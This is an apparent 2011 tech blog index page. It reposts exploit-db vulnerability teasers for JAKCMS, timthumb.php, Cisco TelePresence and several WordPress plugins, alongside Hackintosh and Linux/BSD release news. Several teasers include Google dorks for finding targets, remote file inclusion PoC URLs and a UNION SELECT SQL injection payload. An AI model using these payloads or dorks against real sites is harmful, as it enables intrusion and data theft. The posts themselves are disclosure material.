AppUnix

Category: Blog

Our Blog

JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit

23/09/2011 by little_oak

# Exploit Title: JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit
# Google Dork: "Powered By JAKCMS"
# Date: 21/09/2011
# Author: EgiX
# Software Link: http://www.jakcms.com/
# Version: 2.2.5
# Tested on: Windows 7 and Debian 6.0.2
Source: http://www.exploit-db.com/exploits/17882/


Multiple WordPress Plugin timthumb.php Vulnerabilities

23/09/2011 by little_oak

# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)

— Description —
The following WordPress plugins reuse a vulnerable version of the timthumb.php library. By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled domain such as blogger.com.evil.com …


Cisco TelePresence Multiple Vulnerabilities – SOS-11-010

23/09/2011 by little_oak

Sense of Security – Security Advisory – SOS-11-010
Release Date: 19-Sep-2011
Last Update: –
Vendor Notification Date: 21-Feb-2011
Product: Cisco TelePresence Series
Platform: Cisco
Affected versions: C <= TC4.1.2, MXP


WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

23/09/2011 by little_oak

# Exploit Title: Relocate Upload WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)

— PoC —
http://SERVER/db_unx_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

— Vulnerable Code —
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder'])) {
    // WP setup …


WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

23/09/2011 by little_oak

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/
# Version: 1.36 (tested)

— PoC —
http://SERVER/db_unx_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI
(requires POSTing a file with ID wpmm-upload for this to work)

— Vulnerable Code —
if (isset($_FILES['wpmm-upload'])) { …


P5KPL-AM SE: updates on Lion 10.7.1 (current) went very well on the Hackintosh

21/09/2011 by little_oak

Good evening, great masters. We are only posting this extra information to put the hearts of hackintosh lovers more at ease. Just now we applied all the updates made available by Apple on the 10.7.1 (current) architecture on top of the following hardware: CPU – 2160 (Intel dual core), 2 GB of DDR 800 RAM, NVIDIA 8500GT VGA, P5KPL-AM SE …


Basic items for getting into the Hackintosh world

19/09/2011 by Shell

Hi folks… all good? Wow, it has been a long time since I wrote here, folks….. But it is for a noble cause….. I have been doing my best to acquire knowledge that makes the explanations easier and improves the articles for you, our readers….. today I wanted to clarify some aspects that I consider fundamental for enthusiasts of the hackintosh world….. I don't want to be …


FreeBSD 9.0-BETA2 Released

15/09/2011 by little_oak

Ken Smith has announced the availability of the second beta of FreeBSD 9.0, more than a month later than planned: “The second beta build of the 9.0-RELEASE release cycle is now available. Note: the location of the FTP install tree and ISOs have changed slightly. What we used for BETA2 reflects a directory structure that …


openSUSE 12.1 Milestone 5 Released

06/09/2011 by little_oak

Bryen Yunashko has announced the availability of the third milestone release of openSUSE 12.1: “openSUSE 12.1’s milestone 5 is now ready for download. Here are some interesting things you can expect to see when you try milestone 5: further changes have been made to systemd which replaces the SysInitV system, the default is …


WordPress yolink Search plugin <= 1.1.4 SQL Injection

06/09/2011 by little_oak

# Exploit Title: WordPress yolink Search plugin <= 1.1.4 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip
# Version: 1.1.4 (tested)

--------------- PoC (POST data) ---------------
http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php
page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1

--------------- Vulnerable code ---------------
$post_type_in = array();
if( isset( $_POST['page'] ) ) {
    $post_type_in[] …

